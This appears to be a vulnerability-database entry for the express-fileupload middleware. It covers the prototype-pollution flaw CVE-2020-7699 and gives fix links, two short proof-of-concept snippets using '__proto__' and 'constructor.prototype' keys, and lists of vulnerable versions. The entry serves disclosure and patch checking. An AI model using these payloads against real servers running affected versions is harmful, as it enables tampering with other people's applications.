Simple express file upload middleware that wraps around Busboy
Latest version: 1.2.1
CVE | Fix |
---|---|
CVE-2020-7699 | https://github.com/richardgirges/express-fileupload/commit/9fca550f08a9dc07cc3500921f4fa7879cf88b8f, https://github.com/richardgirges/express-fileupload/pull/237/files |
const processNested = require('express-fileupload/lib/processNested');
processNested({'__proto__.a': 'b'});
if (({}).a === 'b') console.log('exploitable');
Vulnerable versions: 1.1.1-alpha.1
1.1.1-alpha.2
1.1.1-alpha.3
1.1.2-alpha.1
1.1.3-alpha.1
1.1.3-alpha.2
1.1.4
1.1.5
1.1.6-alpha.1
1.1.6-alpha.2
1.1.6-alpha.3
1.1.6-alpha.4
1.1.6-alpha.5
1.1.6-alpha.6
1.1.6
1.1.7-alpha.1
1.1.7-alpha.2
1.1.7-alpha.3
1.1.7-alpha.4
const processNested = require('express-fileupload/lib/processNested');
processNested({'constructor.prototype.a': 'b'});
if (({}).a === 'b') console.log('exploitable');
Vulnerable versions: 1.1.1-alpha.1
1.1.1-alpha.2
1.1.1-alpha.3
1.1.2-alpha.1
1.1.3-alpha.1
1.1.3-alpha.2
1.1.4
1.1.5
1.1.6-alpha.1
1.1.6-alpha.2
1.1.6-alpha.3
1.1.6-alpha.4
1.1.6-alpha.5
1.1.6-alpha.6
1.1.6
1.1.7-alpha.1
1.1.7-alpha.2
1.1.7-alpha.3
1.1.7-alpha.4
1.1.8